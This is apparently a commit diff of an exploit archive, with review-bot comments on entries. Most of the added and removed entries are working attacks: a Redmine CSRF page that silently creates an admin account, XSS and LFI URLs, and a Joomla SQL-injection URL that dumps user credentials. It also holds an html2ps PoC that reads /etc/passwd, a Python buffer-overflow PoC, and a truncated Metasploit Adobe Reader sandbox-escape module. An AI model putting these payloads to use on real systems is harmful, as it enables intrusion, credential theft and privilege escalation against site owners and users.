Updated 05_20_2014
parent 51cca24be3
commit 16eeac4edf
89 changed files with 3715 additions and 4306 deletions
9 platforms/linux/local/33395.txt Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37277/info

Linux kernel is prone to a local privilege-escalation vulnerability because the software fails to verify access permissions.

Exploits may allow attackers to execute arbitrary code with kernel-level privileges and launch other attacks.

Successful exploits will result in the complete compromise of affected computers.

http://www.exploit-db.com/sploits/33395.tgz
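Review bot: the new file gives no affected kernel version range and no hint of which access check is missing; it is only the BID link, three generic sentences and a tarball URL. Suggest adding the affected versions (and the CVE, if one was assigned) to the .txt so the entry is useful without fetching the tarball.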
37 platforms/linux/remote/33402.txt Executable file
@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/37322/info

Ruby on Rails is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.

/**
* Redmine <= 0.8.6 CSRF Add Admin User Exploit
* Discovered by: p0deje (http://p0deje.blogspot.com)
* Application: http://www.redmine.org/wiki/redmine/Download
* SA: http://www.redmine.org/news/30
* Date: 13.11.2009
* Versions affected: <= 0.8.6
* Description: this is a simple exploit which exploits CSRF vulnerability in Redmine, it creates user account with adminstartive rights
*/

<html>
<body>
<form method=POST action="http://www.example.com/users/new">
<input style="display: none" type="text" value="hacker" size="25" name="user[login]" id="user_login"/>
<input style="display: none" type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/>
<input style="display: none" type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/>
<input style="display: none" type="text" value="hacker@hacker.com" size="30" name="user[mail]" id="user_mail"/>
<input style="display: none" type="password" size="25" name="password" id="password" value="hacker" />
<input style="display: none" type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" />
<input style="display: none" type="checkbox" value="1" name="user[admin]" id="user_admin"/>
<input style="display: none" type="hidden" value="1" name="user[admin]"/>
<input style="display: none" type="submit" value="Create" id="commit" name="commit" />
</form>
<script>document.getElementById("commit").click();</script>
</body>
</html>

/**
* P.S. Actually, this vulnerability wasn't fixed in Redmine 0.8.7, because token was generated one time for all the pages and allthe users.
* Thus, you can add POST data with token of any user and exploit will be working again
*/
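Review bot: the 'Versions affected: <= 0.8.6' header contradicts the P.S. block, which says the bypass still works on 0.8.7 because the token was generated once for all pages and all users; that caveat belongs in the Versions affected line, since it is the detail that matters for remediation (the authenticity token has to be per-session). Also, 'adminstartive' in the Description line should read 'administrative'.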
15 platforms/multiple/remote/33405.txt Executable file
@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/37338/info


The APC Network Management Card is prone to multiple cross-site request-forgery and cross-site scripting vulnerabilities.

An attacker can exploit the cross-site request forgery issues to alter the settings on affected devices, which may lead to further network-based attacks.

The attacker can exploit the cross-site scripting issues to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible.

Versions prior to the following are vulnerable:

Network Management Card Firmware 3.7.2
Network Management Card Firmware 5.1.1

http://www.example.com/Forms/login1?login_username=<ScRiPt>alert('hello');</ScRiPt>
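Review bot: the description lists both CSRF and XSS issues, but the file only carries the login_username XSS example; the CSRF finding has no affected form or request documented, so a reader cannot verify a fix for it. Either state which settings forms are affected or narrow the description to what the file demonstrates. The two 'Network Management Card Firmware' lines also do not say which card models each firmware line applies to.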
@ -1,17 +0,0 @@
Advisory Name: Local Privilege Escalation in InterScan Web Security Virtual
Apliance 5.0
Internal Cybsec Advisory Id: 2010-0604
Vulnerability Class: Local Privilege Escalation
Release Date: 22-06-2010
Affected Applications: InterScan Web Security Virtual Aplliance 5.0. Other versions may be affected
Affected Platforms: Red Hat nash 5.1
Local / Remote: Local
Severity: Medium - CVSS: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
Researcher: Ivan Huertas
Vendor Status: Patched
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf

Vulnerability Description:
InterScan Web Security Virtual Appliance has a shell called “uihelper” that has suid bit on. So it could be possible to execute commands as root. Also using the vulnerability “Arbitrary File Upload” remote commands could be run as root.

http://www.exploit-db.com/sploits/cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf
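Review bot: this hunk deletes the whole CYBSEC InterScan advisory (17 lines, 0 additions) and the commit message 'Updated 05_20_2014' gives no reason; if it was a duplicate of another entry or was moved under a different ID, say so in the message. The path of the deleted file is also not shown above the hunk, so the entry cannot be cross-referenced from here.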
@ -1,46 +0,0 @@
#!/usr/bin/env python
#
# html2ps <= 1.0 beta5 arbitrary file disclosure
# http://user.it.uu.se/~jan/html2ps.html
# author: epiphant <epiphant.0@gmail.com>
#
# the "include file" ssi directive doesn't check for directory
# traversal so you can include and disclose any file in the
# dir tree (very handy when html2ps is running as a part of a
# web app with data that you control)
# the vuln requires that "ssi" in the @html2ps block in the
# html2psrc file is set to 1, which is the default
#
# bonus info: some of the backtick operators look shady too
# but will require lots of prerequisites so they're uncool
#
# shouts: thcx labs, zybadawg333, fabiodds, str0ke
# jan k: shame on you - your perl is very ugly
#

import os

d = """\
<html>
<head>
<title>epiphant</title>
</head>
<body>
<h1>epiphant</h1>
<!--#include file="../../../../../../../etc/passwd"-->
<p>epiphant</p>
</body>
</html>
"""

try:
fi = open("epiphant.html", "w")
fi.write(d)
fi.close()
except:
print "can't write here"
exit(1)

os.system("html2ps epiphant.html > epiphant.ps")
os.system("gv epiphant.ps")
exit(0)
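Review bot: same concern as the previous hunk: a 46-line html2ps PoC is removed with no rationale in the commit message. If the entry was withdrawn or re-filed under another ID, record that, since nothing in the hunk itself indicates the file was broken (the lost indentation of the try/except block is a rendering artefact, not part of the change).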
20 platforms/php/remote/33414.php Executable file
@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/37389/info

PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks.

Versions prior to PHP 5.2.12 are vulnerable.

// overlong UTF-8 sequence
echo htmlspecialchars("A\xC0\xAF&", ENT_QUOTES, 'UTF-8');
// invalid Shift_JIS sequence
echo htmlspecialchars("B\x80&", ENT_QUOTES, 'Shift_JIS');
echo htmlspecialchars("C\x81\x7f&", ENT_QUOTES, 'Shift_JIS');
// invalid EUC-JP sequence
echo htmlspecialchars("D\x80&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("E\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("F\x8E\xFF&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("G\x8F\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
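Review bot: the file is stored as .php but has no `<?php` open tag, and the advisory prose above the echo lines is not commented out, so it does not run as saved; either wrap the echo lines in `<?php ... ?>` and move the prose into a comment, or store it as .txt like the other entries. It would also help to document the expected output on a fixed build (5.2.12 and later return an empty string for these invalid multibyte sequences), so the file doubles as a regression check.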
23 platforms/php/remote/33415.php Executable file
@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/37389/info

PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks.

Versions prior to PHP 5.2.12 are vulnerable.

<? php

$ _GET [ ' a1 ' ] = " \xf0 "; // \xf0 - \xfc ??? $ _GET [ 'A1'] = "\ xf0"; / / \ xf0 - \ xfc possible
$ _GET [ ' a2 ' ] = " href=dummy onmouseover=alert(document.title) dummy=dummy "; $ _GET [ 'A2'] = "href = dummy onmouseover = alert (document.title) dummy = dummy";

header ( " Content-Type:text/html; charset=Shift_JIS " ) ; header ( "Content-Type: text / html; charset = Shift_JIS");
?> ? "
< html > <Html>
< head >< title > Shift_JIS test </ title ></ head > <Head> <title> Shift_JIS test </ title> </ head>
< body > <Body>
< p >< a <P> <a title = " <?php echo htmlspecialchars ( $ _GET [ ' a1 ' ] , ENT_QUOTES, ' SJIS ' ) ?> " title = "<? php echo htmlspecialchars ($ _GET [ 'a1'], ENT_QUOTES, 'SJIS')?>" href = " <?php echo htmlspecialchars ( $ _GET [ ' a2 ' ] , ENT_QUOTES, ' SJIS ' ) ?> " > test </ a ></ p > href = "<? php echo htmlspecialchars ($ _GET [ 'a2'], ENT_QUOTES, 'SJIS')?>"> test </ a> </ p>
</ body > </ Body>
</ html > </ Html>
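Review bot: the added file is corrupted: every PHP and HTML line is followed by a mangled copy of itself (`$ _GET [ 'A1'] = "\ xf0"`, `/ / \ xf0`, `<? php`, `< html >`, `<Html>`), which looks like a machine-translation or copy-paste artefact, so the file will not parse as PHP. Re-add it from the original Shift_JIS test case with one clean copy of each line.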
@ -1,6 +1,6 @@
source: http://www.securityfocus.com/bid/9664/info

Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
Reportedly the AllMyPHP application AllMyGuests is prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.

This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.

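Review bot: the only change narrows the affected products from 'AllMyGuests, AllMyLinks and AllMyVisitors' to 'AllMyGuests' while the source BID 9664 link is unchanged, and the commit message does not say why the other two applications were dropped. Record the reason (vendor confirmation, retest, or correction against the BID) so the narrower claim can be trusted.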
12 platforms/php/webapps/33401.txt Executable file
@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/37315/info

Million Pixel Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Million Pixel Script 3, 3 Pro, and 3 Pro Lotto are vulnerable; other versions may also be affected.


The following example URI is available:

http://www.example.com/?pa=[XSS]
9 platforms/php/webapps/33404.txt Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37329/info

phpFaber CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

The following example is available:

http://www.example.com/module.php?mod=[XSS]
11 platforms/php/webapps/33406.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37351/info

Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

This issue affects versions prior to Horde 3.3.6.

Note that additional products that use the Horde framework may also be vulnerable.

http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
11 platforms/php/webapps/33407.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37351/info

Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

This issue affects versions prior to Horde 3.3.6.

Note that additional products that use the Horde framework may also be vulnerable.

http://www.example.com/horde-3.3.5/admin/cmdshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
11 platforms/php/webapps/33408.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37351/info

Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

This issue affects versions prior to Horde 3.3.6.

Note that additional products that use the Horde framework may also be vulnerable.

http://www.example.com/horde-3.3.5/admin/sqlshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
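Review bot: 33406, 33407 and 33408 differ only in the script name (phpshell.php, cmdshell.php, sqlshell.php), and every URL carries `?Horde=<sessid>` for a page under /admin/, i.e. a valid administrator session is a precondition; that should be stated in the text rather than left implicit in the URL, since it determines the severity of a reflected XSS in the path after the script name. Three near-identical files could also be one entry listing the three scripts.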
10 platforms/php/webapps/33409.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37356/info

Article Directory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The following example is available:

Username : X' or ' 1=1
Password : X' or ' 1=1
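Review bot: the example gives the Username and Password field values but not the login script or form they belong to, so the finding cannot be located for remediation or retest; add the affected script path, as the other entries do with an example URI.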
13 platforms/php/webapps/33410.txt Executable file
@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/37371/info

The Sections module for Drupal is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

To exploit this issue, the attacker must have 'administer sections' permissions.

Versions prior to Sections 5.x-1.3 and 6.x-1.3 are vulnerable.

The following example input is available:

<script>alert('xss');</script>
9 platforms/php/webapps/33411.txt Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37380/info

iDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

iSupport 1.8 and prior versions are vulnerable.

http://www.example.comhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
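Review bot: the example URL is missing the slash after the host: `http://www.example.comhelpdesk/function.php?...` should be `http://www.example.com/helpdesk/function.php?...` (compare the 33412 URL, which has it). The description line also lacks a full stop after 'user-supplied input'.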
9 platforms/php/webapps/33412.txt Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37380/info

iDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

iSupport 1.8 and prior versions are vulnerable.

http://www.example.com/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
9 platforms/php/webapps/33413.txt Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37384/info

Pluxml-Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Pluxml-Blog 4.2 is vulnerable; other versions may also be affected.

http://www.example.com/[path]/core/admin/auth.php?p=1">
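Review bot: the example URL stops at `auth.php?p=1">`, an attribute break-out with nothing after it, so on its own it does not show where `p` is reflected; a `[XSS]` placeholder as used in 33401 and 33404, plus a sentence naming the attribute `p` lands in, would make the entry checkable against a fix.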
9 platforms/php/webapps/33416.txt Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37393/info

QuiXplorer is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

QuiXplorer 2.4.1beta is vulnerable; other versions may also be affected.

http://www.example.com/path/?lang=../path/to/malicious_uploaded_code
12 platforms/php/webapps/33417.txt Executable file
@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/37394/info

cPanel is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

cPanel versions prior to 11.25.0 are affected.


http://www.example.com:2082/frontend/x3/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS

http://www.example.com:2082/frontend/x3/files/dofileop.html?fileop=&opdir=&opfile=&dir=%2fhome%2fuser%2ftmp&fileop=HaCkED%20by%20RENO
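Review bot: the second URL passes `fileop=` twice (empty first, then `HaCkED%20by%20RENO`), and that defacement string is not a neutral placeholder; use a single `fileop=[XSS]` parameter, as the first URL's bracketed placeholders do, so the example is unambiguous. The description line also lacks a full stop after 'user-supplied input'.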
7 platforms/php/webapps/33418.txt Executable file
@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37403/info

The 'com_joomportfolio' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_joomportfolio&Itemid=552&task=showcat&catid=1&secid=1/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password),user()/**/from/**/jos_users/**/
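Review bot: the example URL hard-codes site-specific values (`Itemid=552`, `catid=1`) and never says in prose which parameter is injectable (`secid`, going by the URL); the other entries use bracketed placeholders, so a sentence naming the parameter and placeholders for the site-specific values would be consistent and easier to check against a fix.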
9 platforms/php/webapps/33419.txt Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37408/info

F3Site is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

F3Site 2009 is vulnerable; other versions may also be affected.

http://www.example.com/mod/poll.php?GLOBALS[nlang]=[LFI%00]
9 platforms/php/webapps/33420.txt Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37408/info

F3Site is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

F3Site 2009 is vulnerable; other versions may also be affected.

http://www.example.com/mod/new.php?GLOBALS[nlang]=[LFI%00]
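Review bot: 33419 and 33420 both inject through `GLOBALS[nlang]`, which is a register_globals-style overwrite of a global rather than an ordinary request parameter, and both rely on `%00` truncation of the include path; neither precondition (register_globals enabled, and a PHP version that still honours a null byte in include paths, which PHP 5.3.4 stopped doing) is stated in the text. Add both, since they decide whether a given F3Site install is actually exposed.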
@ -25,7 +25,7 @@ note: generally admin name: admin

admin login for demo:

http://demo.deltascripts.com/classifieds/admin/login.php
http://localhost/classifieds/admin/login.php


example for demo:
@ -40,7 +40,7 @@ example 2:

admin login:

http://www.maramuresul-istoric.ro/anunturi/admin/login.php
http://localhost/anunturi/admin/login.php



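Review bot: replacing the vendor demo URL and the third-party host `www.maramuresul-istoric.ro` with `http://localhost/...` is the right call, since a published PoC should not point at a live third-party site; the commit message 'Updated 05_20_2014' should say that this is what changed, and the same replacement in the @ -25 hunk above belongs in that note too.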
@ -1,4 +1,4 @@
[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability
[~] deltascripts phplinks Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
@ -25,7 +25,7 @@ note: generally admin name: admin

admin login for demo:

http://demo.deltascripts.com/classifieds/admin/login.php
http://localhost/classifieds/admin/login.php


example for demo:
@ -40,7 +40,7 @@ example 2:

admin login:

http://www.maramuresul-istoric.ro/anunturi/admin/login.php
http://localhost/anunturi/admin/login.php



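Review bot: the @ -1,4 hunk retitles this file from phpclassifieds to phplinks, but its @ -25 and @ -40 hunks still point at `classifieds/admin/login.php` and `anunturi/admin/login.php`, the same paths the phpclassifieds entry above uses; if the phplinks product has different admin paths, these lines are copy-paste residue from the classifieds advisory and should be corrected together with the title.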
@ -1,22 +0,0 @@
[*] Endonesia 8.4 CMS
[*] Site: http://www.endonesia.org/
[*] Download: http://sourceforge.net/projects/endonesia
[*] Bug: Local File Inclusion in mod.php file !
[*] Author: s4r4d0
[*] Mail: s4r4d0@yahoo.com
[*] Team: Fatal Error
[*] Poc:http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] DEMO:http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] SecurityReason Note :
#
# Vulnerable Code in mod.php :
#
# include("./mod/$mod/index.php");
#
# magic_quotes = Off
#
# - sp3x
#
[*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x !
[*] Made in Brazil
[*] Reference: http://securityreason.com/exploitalert/7435
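Review bot: this removes the Endonesia LFI entry in full with no reason in the commit message. Removal is defensible, since the file carried a 'DEMO' URL against a live third-party host (www.trubus-online.com), but if that was the motivation, the SecurityReason note identifying the vulnerable line (`include("./mod/$mod/index.php")` with magic_quotes off) is the part worth keeping for anyone fixing the CMS, and only the DEMO line needed to go.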
29 platforms/windows/dos/33403.py Executable file
@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/37325/info

Intellicom 'NetBiterConfig.exe' is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

#!/usr/bin/python

# Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite.
# Ruben Santamarta - www.reversemode.com
# For research purposes ONLY.
# If you use this code to cause damage I’ll cut you open like a f***ing pig.

import sys
import socket

s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("10.10.10.10",3250))
s.send("protocol version = 1.10; "
+"fb type = EVIL-DEVICE; "
+"module version = 0.66.6; "
+"mac = 00-30-11-00-BA-CA; "
+"ip = 192.168.1.52; "
+"sn = 255.255.255.0; "
+"gw = 192.168.1.1; "
+"dhcp = off; "
+"pswd = off; "
+"hn = "+"A"*0×60+"; "
+"dns1 = 192.168.1.33;")
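Review bot: `"A"*0×60` uses the multiplication sign U+00D7 instead of `0x60`, so Python raises a SyntaxError before anything runs; the line should read `+"hn = "+"A"*0x60+"; "`. The advisory prose above the shebang (the source: line and the two 'Intellicom ...' / 'Attackers can ...' sentences) is also uncommented inside a .py file, and the target `10.10.10.10` is hard-coded even though `sys` is imported and never used; taking the address from `sys.argv` would make the hard-coded value go away.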
@ -1,358 +0,0 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking

include Msf::Exploit::EXE
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Registry

def initialize(info={})
super(update_info(info, {
'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass',
'Description' => %q{
This module exploits a vulnerability on Adobe Reader X Sandbox. The
vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe
process to write register values which can be used to trigger a buffer overflow on
the AdobeCollabSync component, allowing to achieve Medium Integrity Level
privileges from a Low Integrity AcroRd32.exe process. This module has been tested
successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Felipe Andres Manzano', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-2730' ],
[ 'OSVDB', '93355' ],
[ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ]
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => 'meterpreter',
'Payload' =>
{
'Space' => 12288,
'DisableNops' => true
},
'Targets' =>
[
[ 'Adobe Reader X 10.1.4 / Windows 7 SP1',
{
'AdobeCollabSyncTrigger' => 0x18fa0,
'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF"
}
],
],
'DefaultTarget' => 0,
'DisclosureDate'=> 'May 14 2013'
}))

end

def on_new_session
print_status("Deleting Malicious Registry Keys...")
if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself")
end
if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself")
end
print_status("Cleanup finished")
end

# Test the process integrity level by trying to create a directory on the TEMP folder
# Access should be granted with Medium Integrity Level
# Access should be denied with Low Integrity Level
# Usint this solution atm because I'm experiencing problems with railgun when trying
# use GetTokenInformation
def low_integrity_level?
tmp_dir = expand_path("%TEMP%")
cd(tmp_dir)
new_dir = "#{rand_text_alpha(5)}"
begin
session.shell_command_token("mkdir #{new_dir}")
rescue
return true
end

if directory?(new_dir)
session.shell_command_token("rmdir #{new_dir}")
return false
else
return true
end
end

def check_trigger
signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length)
if signature == target['AdobeCollabSyncTriggerSignature']
return true
end
return false
end

def collect_addresses
# find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe
@addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger']
vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}")

# find kernel32.dll
kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll")
@addresses['kernel32.dll'] = kernel32["return"]
if @addresses['kernel32.dll'] == 0
fail_with(Exploit::Failure::Unknown, "Unable to find kernel32.dll")
end
vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}")

# find kernel32.dll methods
virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc")
@addresses['VirtualAlloc'] = virtual_alloc["return"]
if @addresses['VirtualAlloc'] == 0
fail_with(Exploit::Failure::Unknown, "Unable to find VirtualAlloc")
end
vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}")

reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA")
@addresses['RegGetValueA'] = reg_get_value["return"]
if @addresses['RegGetValueA'] == 0
fail_with(Exploit::Failure::Unknown, "Unable to find RegGetValueA")
end
vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}")

# find ntdll.dll
ntdll = session.railgun.kernel32.GetModuleHandleA("ntdll.dll")
@addresses['ntdll.dll'] = ntdll["return"]
if @addresses['ntdll.dll'] == 0
fail_with(Exploit::Failure::Unknown, "Unable to find ntdll.dll")
end
vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}")
end

# Search a gadget identified by pattern on the process memory
def search_gadget(base, offset_start, offset_end, pattern)
mem = base + offset_start
length = offset_end - offset_start
mem_contents = session.railgun.memread(mem, length)
return mem_contents.index(pattern)
end

# Search for gadgets on ntdll.dll
def search_gadgets
ntdll_text_base = 0x10000
search_length = 0xd6000

@gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3")
if @gadgets['mov [edi], ecx # ret'].nil?
fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'")
end
@gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll']
@gadgets['mov [edi], ecx # ret'] += ntdll_text_base
vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}")

@gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2
vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}")

@gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3")
if @gadgets['pop edi # ret'].nil?
fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop edi # ret'")
end
@gadgets['pop edi # ret'] += @addresses['ntdll.dll']
@gadgets['pop edi # ret'] += ntdll_text_base
vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}")

@gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3")
if @gadgets['pop ecx # ret'].nil?
fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop ecx # ret'")
end
@gadgets['pop ecx # ret'] += @addresses['ntdll.dll']
@gadgets['pop ecx # ret'] += ntdll_text_base
vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}")
end

def store(buf, data, address)
i = 0
while (i < data.length)
buf << [@gadgets['pop edi # ret']].pack("V")
buf << [address + i].pack("V") # edi
